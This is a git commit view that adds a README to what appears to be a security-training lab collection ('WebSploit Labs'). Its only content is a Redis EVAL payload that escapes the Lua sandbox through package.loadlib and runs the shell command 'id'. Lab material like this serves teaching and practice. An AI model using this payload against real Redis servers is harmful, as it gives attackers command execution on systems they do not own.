Create README.md

This commit is contained in:
Omar Santos 2023-08-27 15:27:54 -04:00 committed by GitHub
parent 1dbb2a3ff5
commit 2c2160ff4f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 7 additions and 0 deletions

View File

@ -0,0 +1,7 @@
# Additional Exploits Used in WebSploit Labs
## DEC31_01
```
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0
```